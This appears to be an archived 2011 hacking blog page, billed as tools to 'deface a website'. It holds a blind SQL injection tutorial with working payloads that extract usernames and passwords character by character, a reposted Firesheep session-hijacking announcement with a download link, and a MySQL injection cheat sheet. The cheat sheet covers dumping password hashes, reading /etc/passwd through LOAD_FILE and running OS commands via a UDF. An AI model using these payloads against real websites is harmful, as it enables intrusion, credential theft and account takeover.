Want to deface a website this is the tools you need
Thursday, August 11, 2011
Wednesday, August 10, 2011
Blind Sql Injection text and video tutorial by t3rm!n4t0r N k1ll3ra
The above we discussed comes under Error based sql injection. Let us the
discuss the harder part i.e. Blind sql injection.
We use our example:
http://www.site.com/news.php?id=7
Let’s test it:
http://www.site.com/news.php?id=7 and 1=1 <--- this is always true and the
page loads normally, that's ok.
http://www.site.com/news.php?id=7 and 1=2 <--- this is false, so if some
text, picture or some content is missing on returned page then that site is
vulnerable to blind sql injection. ☺
GETTING MySQL VERSION
To get the MySQL version in blind attack we use substring:
http://www.site.com/news.php?id=7 and substring(@@version,1,1)=4
This should return TRUE if the version of MySQL is 4. Replace 4 with 5,
and if query return TRUE then the version is 5.
CHECKING FOR SUBSELECT
When select don't work then we use subselect:
http://www.site.com/news.php?id=7 and (select 1)=1
If page loads normally then subselect work, then we are going to see if we
have access to mysql.user:
http://www.site.com/news.php?id=7 and (select 1 from mysql.user limit
0,1)=1
If page loads normally we have access to mysql.user and then later we can
pull some password using load_file() function and OUTFILE.
CHECKING FOR TABLE AND COLUMN NAME
Here luck and guessing works more than anything ☺
http://www.site.com/news.php?id=7 and (select 1 from users limit 0,1)=1
(with limit 0,1 our query here returns 1 row of data, cause subselect returns
only 1 row, this is very important.)
Then if the page loads normally without content missing, the table users
exits. If you get FALSE (some article missing), just change table name until
you guess the right one.
Let’s say that we have found that table name is users, now what we need is
column name. The same as table name, we start guessing. Like i said before
try the common names for columns:
http://www.site.com/news.php?id=5 and (select
substring(concat(1,password),1,1) from users limit 0,1)=1
If the page loads normally we know that column name is password (if we get
false then try common names or just guess). Here we merge 1 with the
column password, then substring returns the first character (1,1)
PULL DATA FROM DATABASE
We found table users i columns username password so we gonna pull
characters from that. Like:
http://www.site.com/news.php?id=7 and ascii(substring((SELECT
concat(username,0x3a,password) from users limit 0,1),1,1))>80
Ok this here pulls the first character from first user in table users. Substring
here returns first character and 1 character in length. ascii() converts that 1
character into ascii value and then compare it with symbol greater then > .So
if the ascii char greater then 80, the page loads normally. (TRUE) we keep
trying until we get false.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT
concat(username,0x3a,password) from users limit 0,1),1,1))>95
We get TRUE, keep incrementing.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT
concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher
http://www.site.com/news.php?id=5 and ascii(substring((SELECT
concat(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
So the first character in username is char(99). Using the ascii converter we
know that char(99) is letter 'c'.
So keep incrementing until you get the end. (when >0 returns false we know
that we have reach the end).
There are lots of tools available for blind sql injection and can be used as
people don’t like manual work because blind sql injection take out your
whole patience ☺
Blind Sql Injection VIDEO TUTZ By k1ll3ra.rar 5.6MB (Archive)
Friday, August 5, 2011
Firesheep Can Hack Social Network Accounts
It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.
This is a widely known problem that has been talked about to death, yet very popular websites continue to fail at protecting their users. The only effective fix for this problem is full end-to-end encryption, known on the web as HTTPS or SSL. Facebook is constantly rolling out new "privacy" features in an endless attempt to quell the screams of unhappy users, but what's the point when someone can just take over an account entirely? Twitter forced all third party developers to use OAuth then immediately released (and promoted) a new version of their insecure website. When it comes to user privacy, SSL is the elephant in the room.
Today at Toorcon 12 I announced the release of Firesheep, a Firefox extension designed to demonstrate just how serious this problem is.
After installing the extension you'll see a new sidebar. Connect to any busy open wifi network and click the big "Start Capturing" button. Then wait.
As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed:
Double-click on someone, and you're instantly logged in as them.
That's it.
Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.
Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win.
System Requirements
- Mac OS X: 10.5 or newer on an Intel processor.
- Windows: XP or newer. Install Winpcap first!
- Linux: Not currently supported.
- Firefox: 3.6.12 or newer. 32-bit only. Firefox 4.x beta not supported.[http://www.filehippo.com/download_firefox/]
Download
Firesheep Hack Social Network Account Demo
more here http://buzzhacks.com/tag/firesheep/
Thursday, August 4, 2011
MySQL SQL Injection Cheat Sheet
| Version | SELECT @@version |
| Comments | SELECT 1; #comment SELECT /*comment*/1; |
| Current User | SELECT user(); SELECT system_user(); |
| List Users | SELECT user FROM mysql.user; -- priv |
| List Password Hashes | SELECT host, user, password FROM mysql.user; -- priv |
| Password Cracker | John the Ripper will crack MySQL password hashes. |
| List Privileges | SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas) SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns |
| List DBA Accounts | SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER'; SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv |
| Current Database | SELECT database() |
| List Databases | SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0 SELECT distinct(db) FROM mysql.db -- priv |
| List Columns | SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' |
| List Tables | SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema' |
| Find Tables From Column Name | SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find table which have a column called 'username' |
| Select Nth Row | SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0 SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0 |
| Select Nth Char | SELECT substr('abcd', 3, 1); # returns c |
| Bitwise AND | SELECT 6 & 2; # returns 2 SELECT 6 & 1; # returns 0 |
| ASCII Value -> Char | SELECT char(65); # returns A |
| Char -> ASCII Value | SELECT ascii('A'); # returns 65 |
| Casting | SELECT cast('1' AS unsigned integer); SELECT cast('123' AS char); |
| String Concatenation | SELECT CONCAT('A','B'); #returns AB SELECT CONCAT('A','B','C'); # returns ABC |
| If Statement | SELECT if(1=1,'foo','bar'); -- returns 'foo' |
| Case Statement | SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A |
| Avoiding Quotes | SELECT 0x414243; # returns ABC |
| Time Delay | SELECT BENCHMARK(1000000,MD5('A')); SELECT SLEEP(5); # >= 5.0.12 |
| Make DNS Requests | Impossible? |
| Command Execution | If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform. |
| Local File Access | ...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files. SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file system |
| Hostname, IP Address | Impossible? |
| Create Users | CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv |
| Delete Users | DROP USER test1; -- priv |
| Make User DBA | GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv |
| Location of DB files | SELECT @@datadir; |
| Default/System Databases | information_schema (>= mysql 5.0) mysql |
Subscribe to:
Posts (Atom)
Posts
